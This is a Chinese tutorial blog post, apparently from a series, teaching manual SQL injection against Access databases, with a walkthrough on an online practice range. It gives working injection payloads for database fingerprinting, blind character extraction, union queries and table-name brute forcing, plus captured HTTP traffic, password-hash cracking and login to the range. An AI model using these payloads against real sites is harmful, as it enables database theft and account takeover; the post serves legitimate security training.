渗透测试---手把手教你SQL注入(7)---Access数据库注入

tips:手把手教你SQl注入的往期文章点这里:

渗透测试----手把手教你SQL手工注入--(联合查询,报错注入)http://t.csdnimg.cn/nGVfl

在讨论SQL注入中的Access数据库注入时，首先需要了解Access数据库的一些基本知识。Microsoft Access 是一种关系型数据库管理系统，可用于存储、管理和检索数据。虽然Access通常用于较小的数据库和单服务器环境，但它也可以用于大型企业和互联网应用。

此外,Access与其他数据库管理系统（如MySQL、SQL Server等）在处理SQL注入方面有所不同。

基本流程:

判断数据库类型->判断表名->判断列名->判断列名长度->查出数据。

其中,判断表名就不能像MYSQL那样使用截取函数一点点地"试"出来,Access的表名只能使用爆破的方式.

判断数据库类型:

使用asp的网站，常用数据库为access、sqlserver。

我们可以通过下面两条语句判断数据库类型：

and exists (select * from msysobjects)>0   access

这个SQL语句的目的是检查msysobjects表是否有任何行返回。
如果存在这样的情况，那么查询结果将为真（即结果大于0）。

and exists (select * from sysobjects)>0      sqlserver

'exists' 是一个SQL关键词，它用来检查子查询是否有返回任何行。
如果子查询返回至少一个行，
那么 'exists' 将会返回真（1），否则它会返回假（0）。

 如下图,结果表明目标服务器使用的是Access数据库(存在msysobjects表)

如下图, 结果表明目标服务器使用的不是sqlserver数据库(不存在sysobjects表)

Access注入---逐字破解法 

这里先给出注入过程中可能遇到的语句,具体的实战演练见下文:

查表：and exists (select * from 表名)

查列：and exists (select 列名 from 表名) //存在就返回正常页面，不存在就报错。

查数据：1.确定此条数据字段（列名）长度         2.确定asc数据(ascii编码)

---

and (select top 1 len(列名) from 表名)=5 //top1 仅显示第一条数据（select结果集元组），避免页面出错 经测试，此为此列第一条数据的长度。

and (select top 1 len(列名) from 表名)>5 //判断是不是长度大于5。

---

and (select top 1 asc(mid(列名,位数,1)) from admin)=97 //mid()用于从文本中提取字段 mid(列名，起始位置，要返回的字符数)

and (select top 1 asc(mid(user,1,1)) from admin)=97 //返回页面正常没有报错，说明user列第一条数据第一位是a,

and (select top 1 asc(mid(user,2,1)) from admin)=97 //user列第2条数据第一位是b....一直猜到len(列名)长度

 在线靶场实战演练:

由于一方找不到合适的离线靶场,这里使用的是"墨者学院"网站中的在线靶场:

墨者学院官网链接

点击启动靶场环境(注册墨者学院账户后会自动赠送12墨币):

 

 访问靶场的IP和端口:

寻找注入点:

寻找注入点不能一蹴而就,首先先做一些简单的测试:

先随便输入一组账号密码,再用BurpSuite抓包试试水,这里试试弱口令admin/admin:

登陆不成功,再试着修改post请求中的参数:

发现无论是那种方式,响应包的长度都没有变化(这里就不放每一步的图了):
name=admin'
name=admin''
name=admin' or 1=1'

 请求包的内容(测试name=admin'+or+1=1):

POST /login.asp HTTP/1.1
Host: 219.153.49.228:46204
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://219.153.49.228:46204
Connection: close
Referer: http://219.153.49.228:46204/
Cookie: ASPSESSIONIDSACBDTRD=BABBAMECNJNBHHDKHGFMGOJL
Upgrade-Insecure-Requests: 1

name=admin'+or+1=1'&password=admin&login=%B5%C7%C2%BC

 响应包的内容(长度依旧没有变化(￣_￣|||)):

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 Oct 2023 02:06:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 80
Content-Type: text/html
Cache-control: private

<script>alert('�û����������');location='javascript:history.back(-1)';</script>

 似乎没有明显的注入点,先暂时换一换思路,我们来查看一下web页面的源代码:(F12)

在源码里有了意外发现,里面有一个链接"new_list.asp?id=1":

 链接中出现了?id=1,😮要素察觉😮,这里很有可能会是一个注入点!

 接下来依次测试?id=1'  ?id=1'' ?id=1/1 ?id=1/0,最终发现这里极有可能存在数字型的注入!

 找到了注入点,几乎就等于成功一般啦!✌

 接下试着判断数据库类型,(当然,本靶场已经提前知道了是Access数据库):

 发现结果是False,这里很有可能过滤掉了exists等其他函数,这种情况下最省事的方法就是在Access和sqlsever中二选一,不必再费大功夫一点点验证数据库类型!(使用asp的网站，常用数据库为access、sqlserver。)

回到靶场上来,我们发现无论结果真假,页面中的红色横线始终存在,说明这条横线起到分割结果的作用,我们可以试试联合注入:

渗透测试----手把手教你SQL手工注入--(联合查询,报错注入)

接下来试试联合注入是否可行:

 order by 4时返回正常,order by 5时返回错误,说明后台语句查询的结果有4列,接下来使用

?id=-1 union select 1,2,3,4 from 表名 来找出显示位,由于事先不知道表名,这里需要利用BurpSuite进行爆破来找到一个再数据库中存在的表:

注:在MySQL 中union select 1,2,3,4 后不需要加上表名,但Access中必须加上数据库中存在的表!

 通过BurpSuite来爆破表名:

当然,这里也可以直接靠盲猜,常见的表名有:

admin,admin_user,admin1,user,username,manage,user_name,guanli

 最终得出数据库中存在admin表

 页面的显示位就是后台查询结果中的第2列和第3列:

通过表名获取列名:

既然知道了表名为admin,我们可以试着猜测一下列名,比如user,username,pass,password,passwd,qwe等,不用使用BP爆破:

常用列名如图:

 这里试出了用户名和密码:

对找到的密码进行解密:

解密网站:CMD5.com

 使用获取到的信息进行登陆: moke/27737201

 成功获取靶场的KEY:mozhe7113650916b807feecef54b7dfd

 后续拓展链接:

渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战篇http://t.csdnimg.cn/3QtB3

Bypass-渗透测试---手把手教你SQL注入---Bypass姿势(如何绕过过滤措施?)http://t.csdnimg.cn/BicwG